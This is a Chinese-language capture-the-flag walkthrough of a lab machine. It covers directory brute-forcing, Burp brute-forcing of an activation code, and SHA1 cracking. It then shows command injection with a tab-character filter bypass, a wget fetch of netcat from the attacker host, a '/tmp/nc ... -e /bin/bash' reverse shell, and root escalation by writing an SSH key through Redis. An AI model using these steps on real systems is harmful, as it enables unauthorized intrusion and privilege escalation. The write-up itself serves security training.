目录
sudo netdiscover -r 192.168.43.27/16



由于我们在主页面没有发现对突破边界有用的信息,所以为了收集更多信息,进行目录爆破
-r参数的意思是不要进行递归的爬取,仅进行一级目录爬取,不对其已存在目录下的子目进行爬取
dir url -r

(1)当我们对这些站点挨个进行信息收集,css,img,js这种没有注释泄露有用信息的话,对我们帮助不大,
(2)这里面对我们帮助最大的就是inc,里面有些配置文件,但是访问的话显示空白。
(3)在刚开始信息收集时,我们看到一个PHPSESSION,证明这个站点是用php搭建的
dirb http://192.168.29.137/ -r -X .php

对这些探测出来的文件进行挨个访问,信息收集。
1.activate.php 激活界面

2.export.php
这是在上个靶机中出现过的一个文件,用来html to pdf的,这里我们还未找到入口,暂时无法利用

3.footer header
这种文件在网站开发的构建中,就是个页脚页头文件,这里对我们没什么用。
4.registration.php
按照步骤,注册一个账号

5.user.php profile.php
无法访问。前面也学到了,如果403拒绝访问的话,我们可以通过更改主机头等方式绕过。
1.注册
输入和上个靶机相似的账号用户名email后显示发生了错误,再次尝试。

2.再次尝试
显示已经存在,看来数据已经到数据库中了,上边那条信息在误导、

3.尝试去登录页面登录

1.activate
有一条我们未激活的信息,很明显,在我们之前发现的文件中进行激活。要求一个id和六位激活码。id我们可以在探测登录后功能时在profile中的url里看出是14

因为这里是有token验证,我的理解是对于我们每一次请求,服务器都响应一个新的token值,下次我们要带着这个token来发起请求。

鱼叉模式,两个字典一对一爆破

①grep extract
提取回包里的token

②Recursive grep

③线程
线程改为1,失败请求次数改为0

④开始攻击
返回了一个302状态码,估计是激活成功

发现已经激活了,这界面和我们上次打靶的靶机有点像,。

1.源码中有这个一个hash值。

2.验证
通过对比,我们可以知道这就是sha1算法

3.hash-sha1解密
网站:md5hashing.net

1.页面分析
应该是个管理员账号,登录后多了个功能

2.功能分析
有两个功能,一个大致设置,一个命令执行,但是不能访问,403了




将站点加入scope
成功加载

1.执行id

2.执行ls -a
报错了,显示不合法字符,经过排查发现是这里不能输入空格
3.tab键绕过
%09
用burp抓包改成tab键的url编码后执行成功

1.上传nc
由于目标主机没有nc,所以说给他上传一个nc
kali端找到nc所在文件夹。用python开启http服务
目标端:
wget http://192.168.29.129/nc -O /tmp/nc
chmod +x somefile 和 chmod a+x somefile 是一样的
chmod +x /tmp/nc
2.反弹shell
(1)测试连接,是否上传成功,成功后进行反弹shell的操作
/tmp/nc ip port
(2)执行
/tmp/nc 192.168.29.129 1234 -e /bin/bash

3.升级一下shell

这里面就是过滤命令执行的一些规则

内核,suid文件,缓冲区溢出,sudo配置均不成功
1.查看网络状态
netstat -ano
2.查看redis进程
他的属主是root,如果它存在漏洞的话,我们可以利用redis反弹shell。
ps aux | grep redis

3./etc/redis
在这里我们发现密码

1.侦听
/tmp/nc -nvlp 4444 > ./authorized_keys
2.kali端生成公私钥
ssh-keygen
3.上传
nc ip 4444 < ./id_rsa -w 1
4.ssh登录
拿到一个权限较高,输出连接稳定的shell,有利于我们之后向redis数据库中写入公钥实现提权。

redis-cli -a 8a7b86a2cd89d96dfcc125ebcc0535e6
执行info可以正常执行
(echo -e "\n\n";cat authorized_keys;echo -e "\n\n") > pub.txt
cat pub.txt | redis-cli -a 8a7b86a2cd89d96dfcc125ebcc0535e6 -x set ssh
![]()
redis-cli -a 8a7b86a2cd89d96dfcc125ebcc0535e6

save
exit
操作无误的话,应该可以直接登录,打靶完成
